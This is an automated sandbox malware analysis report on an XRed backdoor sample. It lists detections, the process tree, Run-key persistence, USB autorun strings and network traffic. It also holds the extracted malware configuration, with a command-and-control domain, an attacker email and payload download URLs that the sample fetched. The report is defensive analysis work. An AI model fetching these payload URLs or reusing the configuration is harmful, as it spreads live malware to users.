
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1583475
MD5: eaba5b2c3b6607177112ec5f26438ba3
SHA1: d0572bad54faca6af612763c6835feb160a3dcd2
SHA256: 43555b4a8bd82abd7e7b1f279b4f31afb5a230ce4246be6fda4fdd5e7263c780
Tags: exe, user-jstrosch

Detection

Family: XRed
Score: 74
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
Writes many files with high entropy
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

  • System is w10x64
  • file.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EABA5B2C3B6607177112EC5F26438BA3)
    • ._cache_file.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\._cache_file.exe" MD5: FD6057B33E15A553DDC5D9873723CE8F)
      • dxwsetup.exe (PID: 7372 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe MD5: EAA6B5EE297982A6A396354814006761)
    • Synaptics.exe (PID: 7364 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
  • EXCEL.EXE (PID: 7420 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 8016 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • Synaptics.exe (PID: 8188 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
  • cleanup
Malware configuration (XRed): {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara matches on the submitted sample:

Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
file.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Yara matches on dropped files:

Source | Rule | Description | Author | Strings
C:\ProgramData\Synaptics\RCXE9B.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCXE9B.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\Synaptics.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Yara matches on memory dumps:

Source | Rule | Description | Author | Strings
00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Process Memory Space: file.exe PID: 7252 | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Yara matches on unpacked PEs:

Source | Rule | Description | Author | Strings
0.0.file.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
0.0.file.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Sigma matches:

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7252, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Local\Temp\r4UZcR9I.xlsm

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:38:52.933059+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 142.250.184.238 | 443 | TCP
2025-01-02T20:37:53.589740+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 69.42.215.252 | 80 | TCP


                          AV Detection

Source: file.exe | Avira: detected
Source: file.exe | Avira: detected
Source: http://xred.site50.net/syn/Synaptics.rarZ | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.iniZ | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll6 | Avira URL Cloud: Label: malware
Source: C:\ProgramData\Synaptics\RCXE9B.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCXE9B.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: file.exe | Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCXE9B.tmp | ReversingLabs: Detection: 93%
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | ReversingLabs: Detection: 93%
Source: file.exe | ReversingLabs: Detection: 92%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 87.8% probability
Source: C:\ProgramData\Synaptics\RCXE9B.tmp | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | Window detected: Installing Microsoft(R) DirectX(R)Welcome to setup for DirectXThe DirectX setup wizard guides you through installation of DirectX Runtime Components. Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement. You must accept the agreement to continue the setup.MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT DIRECTX END USER RUNTIMEThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any Microsoft* updates* supplements* Internet-based services and * support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not* work around any technical limitations in the software;* reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;* make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;* publish the software for others to copy;* rent lease or lend the software;* transfer the software or this agreement to any third party; or* use the software for commercial software hosting services.3. BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4. DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations end users and end use. For additional information see www.microsoft.com/exporting.6. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7. ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8. APPLICABLE LAW.a. United States. If you acquired the s
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: Binary string: wextract.pdb source: file.exe, ._cache_file.exe.0.dr
Source: Binary string: dxwsetup.pdb source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043761767.0000000000D91000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: wextract.pdbU source: file.exe, ._cache_file.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: z:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: x:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: v:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: t:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: r:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: p:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: n:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: l:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: j:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: h:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: f:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: b:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: y:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: w:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: u:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: s:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: q:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: o:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: m:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: k:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: i:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: g:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: e:
Source: C:\ProgramData\Synaptics\Synaptics.exe | File opened: c:
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File opened: a:
Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: autorun.inf
Source: file.exe | Binary or memory string: [autorun]
Source: file.exe | Binary or memory string: [autorun]
Source: file.exe | Binary or memory string: autorun.inf
Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_01001C7F lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcmpA,lstrcmpA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_01001C7F
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: excel.exe | Memory has grown: Private usage: 1MB later: 69MB

                          Networking

Source: Network traffic | Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.5:49710 -> 69.42.215.252:80
Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:50021 -> 142.250.184.238:443
Source: Malware configuration extractor | URLs: xred.mooo.com
Source: unknown | DNS query: name: freedns.afraid.org
Source: Joe Sandbox View | IP Address: 69.42.215.252 69.42.215.252
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic | DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic | DNS traffic detected: DNS query: docs.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5J2wcYuTkX-xkQT8FSKqGHktGrzCtpgjVhmKpHsBNkyL4wZjkxiFYFAAAXhYAcuOMjHRMwmuIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:38:53 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6t4U7rP3YozBkUnFONUWRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I; expires=Fri, 04-Jul-2025 19:38:53 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6A28wtMAypMUfN65dy_3-vAh4CsIODc516Ohuug12TEwPqshOxGb5qediKdLFaray1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:38:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-NYOikIDt8jRF7wIiCKzr-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4nIj-xFHayWQlLPQMIEN6VRTOWSws6WCBYkU9pKfPjOxbD7UolSx0sYbijBEYaJvdPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:38:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-yednUhlFkoA8wB6tRtwLSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: file.exe | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978W%
Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978n%
Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978q
Source: Synaptics.exe, 00000003.00000003.2701819372.0000000000726000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978t
Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
Source: dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.BetaPlace.com
Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.BetaPlace.com.?
Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.BetaPlace.comEContinuare
Source: dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.betaplace.com
Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2045818625.0000000000C84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.betaplace.com.
Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.betaplace.com.DInstalacn
Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
Source: file.exe | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: file.exe | String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: file.exe | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
